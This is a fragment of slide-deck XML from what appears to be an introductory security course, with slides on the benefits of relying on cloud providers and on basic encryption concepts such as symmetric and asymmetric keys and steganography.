      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="700" name="Google Shape;700;p114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574350" y="552150"/>
            <a:ext cx="2917200" cy="39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 Benefits</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="Google Shape;701;p114"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4066575" y="308325"/>
            <a:ext cx="4699800" cy="4569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000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Most of the time </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>companies</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> do have better security measurements than us. Also better devices and observations.</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Automatic scale up (more resources) / scale out (more servers) while under attack</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Most of the time they do have DDoS defense and such</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We will need less resources and just purchase them</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Easier Auditing (legal and technical)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Easier disaster recovery (make sure that your provider stores them beforehand!)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>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5" name="Shape 705"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="706" name="Google Shape;706;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841500" y="759174"/>
            <a:ext cx="5460900" cy="95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Encryption</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="707" name="Google Shape;707;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="873275" y="1763575"/>
            <a:ext cx="3640800" cy="2482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b="1" lang="en"/>
              <a:t>Confidentiality (and also </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Plain text -&gt; Enc algorithm -&gt; Cipher Text</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Keys should be secret, not the algorithms</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Symmetric (Key, single key, secret key, session key, shared key)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Asymmetric</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Steganography </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="708" name="Google Shape;708;p115"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4606300" y="1763575"/>
            <a:ext cx="3640800" cy="2482800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="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